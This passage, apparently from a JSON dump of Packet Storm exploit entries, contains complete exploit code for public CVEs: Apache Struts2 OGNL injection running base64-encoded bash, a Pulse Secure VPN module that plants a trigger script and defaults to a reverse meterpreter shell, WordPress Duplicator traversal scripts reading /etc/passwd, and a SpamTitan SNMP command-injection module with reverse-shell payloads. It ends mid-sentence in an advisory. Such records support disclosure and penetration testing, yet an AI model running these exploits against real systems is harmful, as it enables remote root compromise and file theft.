'uri' => normalize_uri(target_uri.path) } \nhttp_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank? \nif cve == 'CVE-2019-0230' \nhttp_request_parameters['method'] = 'GET' \nhttp_request_parameters['vars_get'] = { datastore['NAME'] => \"%{#{ognl}}\" } \nelsif cve == 'CVE-2020-17530' \nhttp_request_parameters['method'] = 'POST' \nhttp_request_parameters['vars_post'] = { datastore['NAME'] => \"%{#{ognl}}\" } \nend \nhttp_request_parameters \nend \n \ndef build_ognl(cve, cmd) \ncmd = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\" \nognl = [] \nif cve == 'CVE-2019-0230' \nognl << '#context=#attr[\\'struts.valueStack\\'].context' \nognl << '#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)' \nognl << \"@java.lang.Runtime@getRuntime().exec(\\\"#{cmd}\\\")\" \nelsif cve == 'CVE-2020-17530' \nognl << '#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]' \nognl << '#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]' \nognl << '#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")' \nognl << '#bean.setBean(#stack)' \nognl << '#context=#bean.get(\"context\")' \nognl << '#bean.setBean(#context)' \nognl << '#macc=#bean.get(\"memberAccess\")' \nognl << '#bean.setBean(#macc)' \nognl << '#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")' \nognl << '#bean.put(\"excludedClasses\",#emptyset)' \nognl << '#bean.put(\"excludedPackageNames\",#emptyset)' \nognl << '#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")' \nognl << \"#execute.exec({\\\"#{cmd}\\\"})\" \nend \n \nognl \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160721/struts2_multi_eval_ognl.rb.txt"}, {"lastseen": "2020-12-18T19:20:49", "description": "", "cvss3": {}, "published": "2020-12-18T00:00:00", "type": "packetstorm", "title": "Pulse Secure VPN Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8260"], "modified": "2020-12-18T00:00:00", "id": "PACKETSTORM:160619", "href": "https://packetstormsecurity.com/files/160619/Pulse-Secure-VPN-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \nENCRYPTION_KEY = \"\\x7e\\x95\\x42\\x1a\\x6b\\x88\\x66\\x41\\x43\\x1b\\x32\\xc5\\x24\\x42\\xe2\\xe4\\x83\\xf8\\x1f\\x58\\xb0\\xe9\\xe9\\xa5\".b \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Pulse Secure VPN gzip RCE', \n'Description' => %q{ \nThe Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability \nwhich allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root. \nAdmin credentials are required for successful exploitation. \nOf note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`. \n}, \n'Author' => [ \n'h00die', # msf module \n'Spencer McIntyre', # msf module \n'Richard Warren <richard.warren@nccgroup.com>', # original PoC, discovery \n'David Cash <david.cash@nccgroup.com>', # original PoC, discovery \n], \n'References' => [ \n['URL', 'https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605'], \n['URL', 'https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/'], \n['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601'], \n['CVE', '2020-8260'] \n], \n'DisclosureDate' => '2020-10-26', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix In-Memory', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_memory, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' } \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' } \n} \n] \n], \n'Payload' => { 'Compat' => { 'ConnectionType' => '-bind' } }, \n'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'CMDSTAGER::FLAVOR' => 'curl' }, \n'DefaultTarget' => 1, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES], \n'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure'] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The URI of the application', '/']), \nOptString.new('USERNAME', [true, 'The username to login with', 'admin']), \nOptString.new('PASSWORD', [true, 'The password to login with', '123456']) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 1.5 ]), \n]) \nend \n \ndef check(exploiting: false) \nlogin \nres = send_request_cgi({ 'uri' => normalize_uri('dana-admin', 'misc', 'admin.cgi') }) \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless res&.code == 200 \nversion = res.body.scan(%r{id=\"span_stats_counter_total_users_count\"[^>]+>([^<(]+)(?:\\(build (\\d+)\\))?</span>})&.last \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless version \nversion, build = version \n \nreturn CheckCode::Unknown unless version.include?('R') \n \nversion, revision = version.split('R', 2) \nprint_status(\"Version #{version.strip}, revision #{revision.strip}, build #{build.strip} found\") \nreturn CheckCode::Appears if version.to_f <= 9.1 && revision.to_f < 9 \n \nCheckCode::Detected \nrescue Msf::Exploit::Failed \nCheckCode::Unknown \nensure \nlogout unless exploiting \nend \n \ndef exploit \ncase (checkcode = check(exploiting: true)) \nwhen Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears \nprint_good(checkcode.message) \nwhen Exploit::CheckCode::Detected \nprint_warning(checkcode.message) \nelse \nfail_with(Module::Failure::Unknown, checkcode.message.to_s) \nend \n \ncase target['Type'] \nwhen :unix_memory \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager( \nlinemax: 262144, # 256KiB \ndelay: datastore['CMDSTAGER::DELAY'] \n) \nend \n \nlogout \nend \n \ndef execute_command(command, _opts = {}) \ntrigger = Rex::Text.rand_text_alpha_upper(8) \nprint_status(\"Exploit trigger will be at #{normalize_uri('dana-na', 'auth', 'setcookie.cgi')} with a header of #{trigger}\") \n \nconfig = build_malicious_config(command, trigger) \nres = upload_config(config) \n \nfail_with(Failure::UnexpectedReply, 'File upload failed') unless res&.code == 200 \n \nprint_status('Triggering RCE') \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'setcookie.cgi'), \n'headers' => { trigger => trigger } \n}) \nend \n \ndef res_get_xsauth(res) \nres.body.scan(%r{name=\"xsauth\" value=\"([^\"]+)\"/>})&.last&.first \nend \n \ndef upload_config(config) \nprint_status('Requesting backup config page') \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi'), \n'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" }, \n'vars_get' => { 'type' => 'system' } \n}) \nfail_with(Failure::UnexpectedReply, 'Failed to request the backup configuration page') unless res&.code == 200 \nxsauth = res_get_xsauth(res) \nfail_with(Failure::UnexpectedReply, 'Failed to get the xsauth token') if xsauth.nil? \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(xsauth, nil, nil, 'form-data; name=\"xsauth\"') \npost_data.add_part('Import', nil, nil, 'form-data; name=\"op\"') \npost_data.add_part('system', nil, nil, 'form-data; name=\"type\"') \npost_data.add_part('8', nil, nil, 'form-data; name=\"optWhat\"') \npost_data.add_part('', nil, nil, 'form-data; name=\"txtPassword1\"') \npost_data.add_part('Import Config', nil, nil, 'form-data; name=\"btnUpload\"') \npost_data.add_part(config, 'application/octet-stream', 'binary', 'form-data; name=\"uploaded_file\"; filename=\"system.cfg\"') \n \nprint_status('Uploading encrypted config backup') \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'import.cgi'), \n'method' => 'POST', \n'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" }, \n'data' => post_data.to_s, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\" \n}) \nend \n \ndef login \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'), \n'method' => 'POST', \n'vars_post' => { \n'tz_offset' => '-300', \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'realm' => 'Admin Users', \n'btnSubmit' => 'Sign In' \n}, \n'keep_cookies' => true \n}) \n \nfail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 302 \nlocation = res.headers['Location'] \nfail_with(Failure::NoAccess, 'Login failed') if location.include?('failed') \n \nreturn unless location.include?('admin%2Dconfirm') \n \n# if the account we login with is already logged in, or another admin is logged in, a warning is displayed. Click through it. \nprint_status('Other admin sessions detected, continuing') \nres = send_request_cgi({ 'uri' => location, 'keep_cookies' => true }) \nfail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200 \nfds = res.body.scan(/name=\"FormDataStr\" value=\"([^\"]+)\">/).last \nxsauth = res_get_xsauth(res) \nfail_with(Failure::UnexpectedReply, 'Login failed (missing form elements)') unless fds && xsauth \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'), \n'method' => 'POST', \n'vars_post' => { \n'btnContinue' => 'Continue the session', \n'FormDataStr' => fds.first, \n'xsauth' => xsauth \n}, \n'keep_cookies' => true \n}) \nfail_with(Failure::UnexpectedReply, 'Login failed') unless res \nend \n \ndef logout \nprint_status('Logging out to prevent warnings to other admins') \nres = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi') }) \nfail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 200 \n \nlogout_uri = res.body.scan(%r{/dana-na/auth/logout\\.cgi\\?xsauth=\\w+}).first \nfail_with(Failure::UnexpectedReply, 'Logout failed') if logout_uri.nil? \n \nres = send_request_cgi({ 'uri' => logout_uri }) \nfail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 302 \nend \n \ndef build_malicious_config(cmd, trigger) \npayload_script = \"#{Rex::Text.rand_text_alphanumeric(rand(6..13))}.sh\" \nperl = <<~PERL \nif (length $ENV{HTTP_#{trigger}}){ \nchmod 0775, \"/data/var/runtime/tmp/tt/#{payload_script}\"; \nsystem(\"env /data/var/runtime/tmp/tt/#{payload_script}\"); \n} \nPERL \ntarfile = StringIO.new \nGem::Package::TarWriter.new(tarfile) do |tar| \ntar.mkdir('tmp', 509) \ntar.mkdir('tmp/tt', 509) \ntar.add_file('tmp/tt/setcookie.thtml.ttc', 511) do |tio| \ntio.write perl \nend \ntar.add_file(\"tmp/tt/#{payload_script}\", 511) do |tio| \ntio.write \"PATH=/home/bin:$PATH\\n\" \ntio.write \"rm -- \\\"$0\\\"\\n\" \ntio.write cmd \nend \nend \n \ngzfile = StringIO.new \ngz = Zlib::GzipWriter.new(gzfile) \ngz.write(tarfile.string) \ngz.close \n \nencrypt_config(gzfile.string) \nend \n \ndef encrypt_config(config_blob) \ncipher = OpenSSL::Cipher.new('DES-EDE3-CFB').encrypt \niv = cipher.iv = cipher.random_iv \ncipher.key = ENCRYPTION_KEY \n \nmd5 = OpenSSL::Digest.new('MD5', \"#{iv}\\x00#{[config_blob.length].pack('V')}\") \n \nciphertext = cipher.update(config_blob) \nciphertext << cipher.final \nmd5 << ciphertext \n \ncipher.reset \n\"\\x09#{iv}\\x00#{[ciphertext.length].pack('V') + ciphertext + cipher.update(md5.digest) + cipher.final}\" \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160619/pulse_secure_gzip_rce.rb.txt"}, {"lastseen": "2021-10-18T15:36:22", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-18T00:00:00", "type": "packetstorm", "title": "WordPress Duplicator 1.3.26 Arbitrary File Read", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2021-10-18T00:00:00", "id": "PACKETSTORM:164533", "href": "https://packetstormsecurity.com/files/164533/WordPress-Duplicator-1.3.26-Arbitrary-File-Read.html", "sourceData": "`# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read \n# Date: October 16, 2021 \n# Exploit Author: nam3lum \n# Vendor Homepage: https://wordpress.org/plugins/duplicator/ \n# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip] \n# Version: 1.3.26 \n# Tested on: Ubuntu 16.04 \n# CVE : CVE-2020-11738 \n \nimport requests as re \nimport sys \n \nif len(sys.argv) != 3: \nprint(\"Exploit made by nam3lum.\") \nprint(\"Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd\") \nexit() \n \narg = sys.argv[1] \nfile = sys.argv[2] \n \nURL = arg + \"/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../..\" + file \n \noutput = re.get(url = URL) \nprint(output.text) \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/164533/wpduplicator1326-fileread.txt"}, {"lastseen": "2020-12-18T19:23:24", "description": "", "cvss3": {}, "published": "2020-12-18T00:00:00", "type": "packetstorm", "title": "WordPress Duplicator 1.3.26 Directory Traversal / File Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11738"], "modified": "2020-12-18T00:00:00", "id": "PACKETSTORM:160621", "href": "https://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Auxiliary::Report \ninclude Msf::Exploit::Remote::HTTP::Wordpress \ninclude Msf::Auxiliary::Scanner \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'WordPress Duplicator File Read Vulnerability', \n'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' plugin version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. This vulnerability was being actively exploited when it was discovered.}, \n'References' => \n[ \n['CVE', '2020-11738'], \n['WPVDB', '10078'], \n['URL', 'https://snapcreek.com/duplicator/docs/changelog'] \n], \n'Author' => \n[ \n'Ramuel Gall', # Vulnerability discovery \n'Hoa Nguyen - SunCSR Team' # Metasploit module \n], \n'DisclosureDate' => 'Feb 19 2020', \n'License' => MSF_LICENSE \n)) \nregister_options( \n[ \nOptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), \nOptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5]) \n]) \nend \ndef check \ncheck_plugin_version_from_readme('duplicator_download','1.3.27', '1.3.24') \nend \ndef run_host(ip) \ntraversal = '../' * datastore['DEPTH'] \nfilename = datastore['FILEPATH'] \nfilename = filename[1, filename.length] if filename =~ /^\\// \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path,'wp-admin', 'admin-ajax.php'), \n'vars_get' => \n{ \n'action' => 'duplicator_download', \n'file' => \"#{traversal}#{filename}\" \n} \n}) \nfail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200 \nfail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? \nprint_status('Downloading file...') \nprint_line(\"\\n#{res.body}\\n\") \nfname = datastore['FILEPATH'] \npath = store_loot( \n'duplicator.traversal', \n'text/plain', \nip, \nres.body, \nfname \n) \nprint_good(\"File saved in: #{path}\") \nend \nend \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/160621/wpduplicator-traversal.rb.txt"}, {"lastseen": "2021-01-05T16:57:30", "description": "", "cvss3": {}, "published": "2021-01-05T00:00:00", "type": "packetstorm", "title": "SpamTitan 7.07 Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11698"], "modified": "2021-01-05T00:00:00", "id": "PACKETSTORM:160809", "href": "https://packetstormsecurity.com/files/160809/SpamTitan-7.07-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::SNMPClient \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SpamTitan Unauthenticated RCE', \n'Description' => %q{ \nTitanHQ SpamTitan Gateway is an anti-spam appliance that protects against \nunwanted emails and malwares. This module exploits an improper input \nsanitization in versions 7.01, 7.02, 7.03 and 7.07 to inject command directives \ninto the SNMP configuration file and get remote code execution as root. Note \nthat only version 7.03 needs authentication and no authentication is required \nfor versions 7.01, 7.02 and 7.07. \n \nFirst, it sends an HTTP POST request to the `snmp-x.php` page with an `SNMPD` \ncommand directives (`extend` + command) passed to the `community` parameter. \nThis payload is then added to `snmpd.conf` by the application. Finally, the \nmodule triggers the execution of this command by querying the SNMP server for \nthe correct OID. \n \nThis exploit module has been successfully tested against versions 7.01, 7.02, \n7.03, and 7.07. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Christophe De La Fuente', # MSF module \n'Felipe Molina' # original PoC \n], \n'References' => \n[ \n[ 'EDB', '48856' ], \n[ 'URL', 'https://www.titanhq.com/spamtitan/spamtitangateway/'], \n[ 'CVE', '2020-11698'] \n], \n'CmdStagerFlavor' => %i[fetch wget curl], \n'Payload' => { \n'DisableNops' => true \n}, \n'Targets' => \n[ \n[ \n'Unix In-Memory', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }, \n'Payload' => { \n'BadChars' => \"\\\\'#\", \n'Encoder' => 'cmd/perl', \n'PrependEncoder' => '/bin/tcsh -c \\'', \n'AppendEncoder' => '\\'#', \n'Space' => 470 \n}, \n'Type' => :unix_memory \n} \n], \n[ \n'FreeBSD Dropper (x64)', \n{ \n'Platform' => 'bsd', \n'Arch' => [ARCH_X64], \n'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' }, \n'Payload' => { \n'BadChars' => \"'#\", \n'Space' => 450 \n}, \n'Type' => :bsd_dropper \n} \n], \n[ \n'FreeBSD Dropper (x86)', \n{ \n'Platform' => 'bsd', \n'Arch' => [ARCH_X86], \n'DefaultOptions' => { 'PAYLOAD' => 'bsd/x86/shell_reverse_tcp' }, \n'Payload' => { \n'BadChars' => \"'#\", \n'Space' => 450 \n}, \n'Type' => :bsd_dropper \n} \n] \n], \n'DisclosureDate' => '2020-04-17', \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK] \n} \n) \n) \nregister_options( \n[ \nOpt::RPORT(80, true, 'The target HTTP port'), \nOptPort.new('SNMPPORT', [ true, 'The target SNMP port (UDP)', 161 ]), \nOptString.new('TARGETURI', [ true, 'The base path to SpamTitan', '/' ]), \nOptString.new( \n'USERNAME', \n[ \nfalse, \n'Username to authenticate, if required (depending on SpamTitan Gateway version)', \n'admin' \n] \n), \nOptString.new( \n'PASSWORD', \n[ \nfalse, \n'Password to authenticate, if required (depending on SpamTitan Gateway version)', \n'hiadmin' \n] \n), \nOptString.new( \n'COMMUNITY', \n[ \nfalse, \n'The SNMP Community String to use (random string by default)', \nRex::Text.rand_text_alpha(8) \n] \n), \nOptString.new( \n'ALLOWEDIP', \n[ \nfalse, \n'The IP address that will be allowed to query the injected `extend` '\\ \n'command. This IP will be added to the SNMP configuration file on the '\\ \n'target. This is tipically this host IP address, but can be different if '\\ \n'your are in a NAT\\'ed network. If not set, `LHOST` will be used '\\ \n'instead. If `LHOST` is not set, it will default to `127.0.0.1`.' \n] \n), \n], self.class \n) \nend \n \ndef check \nsnmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php') \nvprint_status(\"Check if #{snmp_x_uri} exists\") \nres = send_request_cgi( \n'uri' => snmp_x_uri, \n'method' => 'GET' \n) \n \nif res.nil? \nreturn Exploit::CheckCode::Unknown.new( \n\"Could not connect to SpamTitan vulnerable page (#{snmp_x_uri}) - no response\" \n) \nend \n \nif res.code == 302 \nvprint_status( \n'This version of SpamTitan requires authentication. Trying with the '\\ \n'provided credentials.' \n) \nres = send_request_cgi( \n'uri' => '/index.php', \n'method' => 'POST', \n'vars_post' => { \n'jaction' => 'none', \n'language' => 'en_US', \n'address' => datastore['USERNAME'], \n'passwd' => datastore['PASSWORD'] \n} \n) \nif res.nil? \nreturn Exploit::CheckCode::Safe.new('Unable to authenticate - no response') \nend \n \nif res.code == 200 && res.body =~ /Invalid username or password/ \nreturn Exploit::CheckCode::Safe.new( \n'Unable to authenticate - Invalid username or password' \n) \nend \nunless res.code == 302 \nreturn Exploit::CheckCode::Unknown.new( \n\"Unable to authenticate - Unexpected HTTP response code: #{res.code}\" \n) \nend \n \n# For whatever reason, the web application sometimes returns multiple \n# PHPSESSID cookies and only the last one is valid. So, make sure only \n# the valid one is part of the cookie_jar. \ncookies = res.get_cookies.split(' ') \nphp_session = cookies.select { |cookie| cookie.starts_with?('PHPSESSID=') }.last \ncookie_jar.clear \ncookie_jar.add(php_session) \nremaining_cookies = cookies.delete_if { |cookie| cookie.starts_with?('PHPSESSID=') } \ncookie_jar.merge(remaining_cookies) \n \nres = send_request_cgi( \n'uri' => snmp_x_uri, \n'method' => 'GET' \n) \nend \n \nunless res.code == 200 \nreturn Exploit::CheckCode::Safe.new( \n\"Could not connect to SpamTitan vulnerable page (#{snmp_x_uri}) - \"\\ \n\"unexpected HTTP response code: #{res.code}\" \n) \nend \n \nExploit::CheckCode::Appears \nrescue ::Rex::ConnectionError => e \nvprint_error(\"Connection error: #{e}\") \nreturn Exploit::CheckCode::Unknown.new( \n\"Could not connect to SpamTitan vulnerable page (#{snmp_x_uri})\" \n) \nend \n \ndef exploit \nif target['Type'] == :unix_memory \nexecute_command(payload.encoded) \nelse \nexecute_cmdstager(linemax: payload_info['Space'].to_i, noconcat: true) \nend \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\") \nend \n \ndef inject_payload(community) \nsnmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php') \nprint_status(\"Send a request to #{snmp_x_uri} and inject the payload\") \n \npost_params = { \n'jaction' => 'saveAll', \n'contact' => 'CONTACT', \n'name' => 'SpamTitan', \n'location' => 'LOCATION', \n'community' => community \n} \n \n# First, grab the CSRF token, if any (depending on the version) \nres = send_request_cgi( \n'uri' => '/snmp.php', \n'method' => 'GET' \n) \nif res.code == 200 \ndoc = ::Nokogiri::HTML(res.body) \ncsrf_name = doc.xpath('//input[@name=\\'CSRFName\\']/attribute::value').first&.value \ncsrf_token = doc.xpath('//input[@name=\\'CSRFToken\\']/attribute::value').first&.value \nif csrf_name && csrf_token \nprint_status('CSRF token found') \npost_params['CSRFName'] = csrf_name \npost_params['CSRFToken'] = csrf_token \nend \nend \n \nres = send_request_cgi( \n'uri' => snmp_x_uri, \n'method' => 'POST', \n'vars_post' => post_params \n) \nif res.nil? \nfail_with(Failure::Unreachable, \n\"#{peer} - Unable to inject the payload - no response\") \nend \nunless res.code == 200 \nfail_with(Failure::UnexpectedReply, \n\"#{peer} - Unable to inject the payload - unexpected HTTP response \"\\ \n\"code: #{res.code}\") \nend \nbegin \njson_res = JSON.parse(res.body)['success'] \nrescue JSON::ParserError \njson_res = nil \nend \nunless json_res \nfail_with(Failure::UnexpectedReply, \n\"#{peer} - Unable to inject the payload - Unknown error: #{res.body}\") \nend \nend \n \ndef trigger_payload(name) \nprint_status('Send an SNMP Get-Request to trigger the payload') \n \n# RPORT needs to be specified since the default value is set to the web \n# service port. \nconnect_snmp(true, 'RPORT' => datastore['SNMPPORT']) \nbegin \nres = snmp.get(\"1.3.6.1.4.1.8072.1.3.2.3.1.1.8.#{name.bytes.join('.')}\") \nmsg = \"SNMP Get-Request response (status=#{res.error_status}): \"\\ \n\"#{res.each_varbind.map(&:value).join('|')}\" \nif res.error_status == :noError \nvprint_good(msg) \nelse \nvprint_error(msg) \nend \nrescue SNMP::RequestTimeout, IOError \n# not always expecting a response here, so timeout is likely to happen \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nif target['Type'] == :bsd_dropper \n# 'tcsh' is the default shell on FreeBSD \n# Also, make sure it runs in background (&) to avoid blocking \ncmd = \"/bin/tcsh -c '#{[cmd.gsub('\\'', '\\\\\\\\\\'').gsub('\\\\', '\\\\\\\\\\\\')].shelljoin}&'#\" \nend \nname = Rex::Text.rand_text_alpha(8) \nip = datastore['ALLOWEDIP'] || datastore['LHOST'] || '127.0.0.1' \nif ip == '127.0.0.1' \nprint_warning( \n'Neither ALLOWEDIP and LHOST has been set and 127.0.0.1 will be used'\\ \n'instead. It will probably fail to trigger the payload.' \n) \nend \n \n# The injected payload consists of two lines: \n# 1. the community string and the IP address allowed to query this \n# community string \n# 2. the `extend` keyword, the name token used to trigger the payload \n# and the actual command to execute \ncommunity = \"#{datastore['COMMUNITY']}\\\" #{ip}\\nextend #{name} #{cmd}\" \ninject_payload(community) \n \n# The previous HTTP POST request made the application restart the SNMPD \n# service. So, wait a bit to make sure it is running. \nsleep(2) \n \ntrigger_payload(name) \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160809/spamtitan_unauth_rce.rb.txt"}, {"lastseen": "2020-10-05T18:00:39", "description": "", "cvss3": {}, "published": "2020-10-05T00:00:00", "type": "packetstorm", "title": "SpamTitan 7.07 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11698"], "modified": "2020-10-05T00:00:00", "id": "PACKETSTORM:159470", "href": "https://packetstormsecurity.com/files/159470/SpamTitan-7.07-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: SpamTitan 7.07 - Unauthenticated Remote Code Execution \n# Date: 2020-09-18 \n# Exploit Author: Felipe Molina (@felmoltor) \n# Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ \n# Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway \n# Version: 7.07 \n# Tested on: FreeBSD \n# CVE : CVE-2020-11698 \n \n---[SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in \nsnmp-x.php]------------------------------ \n \nSECURITY ADVISORY: SPUK-2020-09/SpamTitan Unauthenticated Remote \nCode Execution in snmp-x.php \nAffected Software: SpamTitan Gateway 7.07 (possibly earlier versions) \nVulnerability: Unauthenticated Remote Code Execution \nCVSSv3: 10.0 \n(https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) \nSeverity: Critical \nRelease Date: 2020-04-17 \nCVE: CVE-2020-11698 \n \nI. Background \n~~~~~~~~~~~~ \n \nFrom www.spamtitan.com: \n \n\"SpamTitan Gateway is a powerful Anti-Spam appliance that equips network \nadministrators with extensive tools to control mail flow and protect against \nunwanted email and malware.\" \n \nII. Description \n~~~~~~~~~~~~~~ \nImproper input sanitization of the parameter \"community\" on the page \nsnmp-x.php would allow a remote attacker to 